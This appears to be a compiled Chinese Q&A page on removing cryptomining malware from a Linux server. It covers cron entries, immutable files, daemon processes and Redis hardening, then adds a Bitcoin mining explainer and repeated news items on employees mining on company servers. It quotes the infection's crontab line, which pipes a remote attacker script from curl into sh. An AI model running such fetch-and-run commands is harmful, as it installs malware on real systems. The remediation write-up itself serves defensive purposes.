服务器被rshim挖矿病毒攻击后 HugePages_Total 透明大页怎么都清不掉 一直占用内存 球球?
问题定位及解决步骤:
1、free -m 查看内存使用状态 ,发现free基本没了。--> 怀疑是服务有内存泄漏,开始排查
2、使用top命令观察,开启的服务占用内存量并不大,且最终文档在一个值,且服务为java应用,内存并没达到父jvm设置上限。按top监控占用内存排序,加起来也不会超过物理内存总量。查看硬盘使用量,占用20%。基本排除虚拟内存占用过大的原因。--->排除服务内存泄漏因素,怀疑mysql和nginx,开始排查
3、因为top命令看 mysql占用内存也再可控范围,是否存在connection占用过多内存,发现并不会,设置最大连接数为1000,最多也不会超过几M。 nginx占用一直非常小。但每次最先被kill的基本都是nginx进程。所以排查,但发现无非就是openfiles数量啥的调整。发现也一切正常。且之前niginx可以正常使用的。
4、最为费解的就是 通过free -m 查看的时候 基本全是used,cache部分很少,free基本没有。但top上又找不到有哪些进程占用了内存。无解
5、注意到有两个进程虽占用内存不多,但基本耗光了100%的cpu。开始想着占cpu就占了,没占内存,现在是内存不不够导致进程被kill的,就没注意这点。
6、实在搞不定,重启服务器,重启了所有服务,服务暂时可用,回家。在路上的时候发现又崩了。忐忑的睡觉。
7、早上起来继续看,这次留意注意了下那两个占用高cpu的进程,kdevtmpfsi 和 networkservice。本着看看是啥进程的心态,百度了下。真相一目了然,两个挖矿病毒。
突然后知后觉的意识到错误原因:
1、cpu占用率高,正常服务使用cpu频率较高的服务最容易最内存超标。(因为在需要使用cpu时没cpu资源,内存大量占用,服务瞬间崩溃),然后看top发现刚刚已经占用内存的进程已经被kill了,所以没发现内存有高占用的情况。
2、后面的应用继续使用cpu时也会发生类似情况,倒是服务一个一个逐渐被kill。
问题点基本定位好了,解决问题就相对简单很多:
通过百度,google,常见的病毒清除步骤基本都能解决。这两个挖矿病毒很常见,大致记录下要点。可能所有病毒都会有这些基础操作。
① 首先,查看当前系统中的定时任务:crontab -l
我服务器上有四个定时下载任务 通过wget 和 curl 下载病毒文件,把异常的删掉。要不然删了病毒文件还是会下载下来
crontab -r,全部删除命令(或根据需求删除定时任务)
② 查找病毒文件 可以全部模糊搜索 清除, 但病毒文件基本都用了chattr +i命令 使用chattr -i filename 后再使用rm -f filename 。可删除
③ kill 病毒进程,但注意kill了可能马上就重启了。因为有守护进程,需要把病毒进程的守护进程也kill掉
④ 检查是否root用户被攻击,可能系统配置信息被更改。
⑤ 最好能理解病毒脚本,通过看代码看它做了些什么。针对脚本取修复系统。
挖矿就是利用比特币挖矿机,就是用于赚取比特币。
用户用个人计算机下载软件然后运行特定算法,与远方服务器通讯后可得到相应比特币,是获取比特币的方式之一。
比特币为一种虚拟的货币,比特币挖矿制度为通过计算机硬件为比特币网络开展数学运算的过程,提供服务的矿工可以得到一笔报酬,因为网络报酬依据矿工完成的任务来计算,为此挖矿的竞争十分激烈。
挖矿实际是性能的竞争、装备的竞争,由非常多张显卡组成的挖矿机,哪怕只是HD6770这种中低端显卡,“组团”之后的运算能力还是能够超越大部分用户的单张显卡的。
而且这还不是最可怕的,有些挖矿机是更多这样的显卡阵列组成的,数十乃至过百的显卡一起来,显卡本身也是要钱的,算上硬件价格等各种成本,挖矿存在相当大的支出。
扩展资料:
比特币挖矿流程:
1、找到矿池
开始挖矿必须要有一个操作方便、产出稳定的矿池,它的作用就是为各个终端细分数据包,可以通过精密的算法将终端计算好的数据包按照比例,支付相应数量的比特币。
2、下载比特币挖矿器(软件)
其实这种挖矿器也有很多种,大家可以去官方网站下载。
3、设置挖矿软件
GUIMiner是个绿色软件,安装完成后我们可以先设置下语言,以便更方便进一步设置。接下来需要对采矿器设置服务器、用户名、密码、设备等。一般服务器从BTC guild系列里面选一个网络较好的就行,用户名和密码就是我们之前自己设置的。
4、比特币挖矿开始
当我们确认都设定无误后,点“开始挖矿”按钮之后就开始挖比特币了,随之显卡很快就会进入全速运行状态,温度升高、风扇转速提高,你可以通过GPU-Z或显卡驱动来监控状态。
参考资料:
参考资料:
1 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmrcrypto-poolfr -j DROP and iptables -A OUTPUT -d xmrcrypto-poolfr -j DROP
2 chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3 pkill minerd ,杀掉进程
4 service stop crond 或者 crontab -r 删除所有的执行计划
5 执行top,查看了一会,没有再发现minerd 进程了。
6检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
/5 curl -fsSL http://wwwhaveabitchincom/pmsh0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:
 View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blogjobbolecom/94518/然后就注入了病毒,下面是解决办法和清除工作:
1 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2 打开 ~/ssh/authorized_keys, 删除你不认识的账号
3 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉
蔚来员工用公司服务器挖矿,已经供认不讳了,这个员工的行为已经触犯了刑法里面的非法控制计算机信息系统罪。犯了这项罪名的,可能会处三年以下有期徒刑或者是拘役,并处或者是单处罚金。情节特别严重的处三年以上7年以下有期徒刑并处罚金。
不管是在哪个行业里面,好像都有一些不大好的员工存在,他们会利用自己的职务之便去满足自己的一些小心思,如果给公司大了的影响不大,可能还好一点。蔚来员工用公司的服务器去挖矿,这是小看意想不到的,所以说每个行业里面应该都存在着漏洞。现在这批员工已经供认不讳了,他后期可能会被处三年以下有期徒刑或者是拘役,并处或者是单处罚金。情节如果特别严重的,还会处三年以上7年以下有期徒刑并处罚金,就是不知道这名员工的行为,属于情节一般还是属于情节严重。
只要是做了这样的事情,获利的钱都需要被全部没收,而且还可能会被罚款。这名员工他从2021年2月的时候就已经开始了这样的违规操作,利用公司的服务器资源进行虚拟货币数字挖掘操作。要说这个人聪明吧,他也聪明,你要说他不聪明吧,他在做违法的事情。别人都说这个人的胆子也太大了吧,不知道他到底是不懂法还是存在着侥幸心理,小编觉得他应该属于后者。
希望大家都不要抱有侥幸心理,不要让自己的日子过得越来越有判头。我们在那个工作岗位上面就需要做哪一份工作,做自己分内的工作,而不是超出范围之外。更不要利用自己的职务之便,去谋取不当之财。否则等待你们的就是一双银手镯,而不是其它的东西。
蔚来员工利用公司服务器挖矿,此前也有先例
蔚来员工利用公司服务器挖矿,此前也有先例,4月7日,有蔚来汽车工作人员向记者证实,此事属实。员工利用公司服务器违规“挖矿”此前已有先例。蔚来员工利用公司服务器挖矿,此前也有先例。
蔚来员工利用公司服务器挖矿,此前也有先例1蔚来员工,用公司服务器挖矿。
就在刚刚,一位微博博主曝出了这么条消息。
据称,涉事人张某是蔚来汽车员工,此前担任某集群服务器管理员。
而他在在职期间,利用职务上的便利,用公司服务器挖虚拟货币。
事件一出,立即登上了微博热搜:
对此,不少网友纷纷发出感慨:
可真刑啊,越来越有判头了呢。
用公司服务器挖矿
虽然对于这件事情,蔚来汽车官方并没有出面做回应。
但是从流露出来的内部消息中,可以获取到些许事件详情。
事情还要追溯到2021年9月1日,蔚来汽车合规和风险管理部收到投诉称:
研发部门员工张某疑似利用其服务器管理的便利,不当利用公司服务器资源进行虚拟货币数字挖掘操作。
而后,蔚来内部经授权,对此事展开了调查。
调查结果显示,张某从2021年2月开始,便开始了这样的违规操作。
其所挖的虚拟货币,从爆料中的中可以看到,是以太币。
并且消息还称,张某在调查期间对于自己的违规行为供认不讳。
而张某的这一行为,触犯了我国刑法第285条第二款非法控制计算机信息系统罪。
据了解,犯此项罪的:
处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的`,处三年以上七年以下有期徒刑,并处罚金。
此前还有百度员工
蔚来员工的事情一经曝出,很多网友纷纷联想到了之前的那位百度工程师。
早在2020年,一位百度员工在短短7个月内便走完了从“挖矿”、“变现”到“被判3年”的三部曲。
其挖矿所用的,便是百度搜索服务器。
在判决书中,也对这位百度员工“薅羊毛”的细节做了公布:
从2018年1月底到5月底,安某薅了155台服务器的羊毛,用来挖比特币、门罗币,卖掉一部分之后获利10万元。
事发之后,不仅这笔钱被没收,还额外被罚了11000元,另外还有3年的有期徒刑。
……
而从国内外来看,近年来公然用公司服务器挖矿的事件时有发生。
虽然截至发稿,蔚来汽车方面并未做出更详细的回应。
但还需从此事中了解一点:
道路千万条,守法第一条。
为了牟利而赌上未来和自由,不值得!
蔚来员工利用公司服务器挖矿,此前也有先例2近日,网传蔚来汽车一份内部处理通报称,一担任某集群服务器管理员的员工,利用其职务便利挖掘虚拟货币,并从中获利,引发热议。4月7日,有蔚来汽车工作人员向南都记者证实,此事属实。截至发稿前,蔚来汽车方面未就此事回应南都记者。
蔚来汽车内部处理通报透露,2021年9月,公司合规和风险管理部收到研发部门一员工疑似不当利用公司服务器资源挖掘虚拟货币的相关投诉。后经调查发现,该员工利用其担任某集群服务器管理员的职务便利,自2021年2月开始不当利用公司服务器算力资源违规进行虚拟货币以太币的数字挖掘作业,并从中获利。
处理通报还称,该行为严重违反了蔚来汽车公司规定,并涉嫌违反《刑法》第285条第二款非法控制计算机信息系统罪,对公司计算机系统安全和商业信息安全造成负面影响。调查访谈中,该员工亦对其违规行为供认不讳。
截至发稿前,蔚来汽车方面尚未就此事回应南都记者。
根据规定,若构成非法控制计算机信息系统罪,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。
南都记者注意到,员工利用公司服务器违规“挖矿”此前已有先例。裁判文书网显示,2018年1月至7月期间,百度前高级运维工程师安某利用职务便利,以技术手段在百度公司服务器上部署“挖矿”程序,通过占用计算机信息系统硬件及网络资源获取比特币、门罗币等虚拟货币,后将部分虚拟货币出售并获利人民币10万元。截至调查前夕,其账户仍有约294个比特币。
法院认为,鉴于安某非法控制计算机信息系统的数量已超过100台,其行为不仅构成非法控制计算机信息系统罪,且属于情节特别严重情形。最终,安某被判处3年有期徒刑,没收违法所得,并处罚金11万元。
蔚来员工利用公司服务器挖矿,此前也有先例34月6日消息,据财经博主@比特肥爆料,蔚来汽车员工张某使用公司服务器资源挖虚拟货币。此人原担任某集群服务器管理员,利用职务便利挖虚拟货币,在调查中,张某对于自己的违规行为供认不讳。
受到疫情影响,2020年初虚拟货币价格一路飙升,不少矿商疯狂抢购显卡挖矿,甚至出现了一些不法分子偷电挖矿。与自己买显卡和付电费相比,这类**资源的方案利润高不少,只是危险性也高不少。
之前就曾报道过,江苏一男子偷用体育馆的电挖矿,由于体育馆耗电量高,很长一段时间都没人发现。直到2020年疫情封城,体育馆没有人了,负责人发现电费仍在蹭蹭往上涨,该男子盗电挖矿的事情才曝光。
至于这种利用公司服务器挖矿的行为,2018年百度也发生过。2018年百度搜索运维部员工安某将自己开发的程序部署到百度服务器上,并借此盈利10万余元。被抓获时,安某的哈希钱包还有14枚比特币。
利用公司服务器挖矿,堪称空手套白狼,或许在他们眼中,自己只是违规,哪怕最终被抓到了,也不过是开除而已。事实上,这种行为已经属于违反非法控制计算机信息系统罪,或将面临有期徒刑。
脱胎于区块链技术的虚拟货币,至今没有表现出任何积极作用,浪费了大量电力和CPU、GPU资源,只得到了一些压根没有任何价值的东西。只是这些虚拟货币不受任何国家管制,所以被某些人奉为圭臬。
好在相关部门已经注意到了虚拟货币带来的恶劣影响,开始出台规定整治虚拟货币行业,多个地区禁止个人或集体挖矿。
最近比特币、以太坊等虚拟货币价格暴跌,受此影响,显卡的价格也在下跌。出现这种情况的原因是全球经济好转,投资虚拟货币的金融大亨开始提现,去投资实体行业,毕竟谁都知道虚拟货币价格不稳定。
至于我们这些普通人,最好还是不要接触虚拟货币之类的东西,也许里面藏着发财的机遇,但大多时候,它只会让我们倾家荡产。
0条评论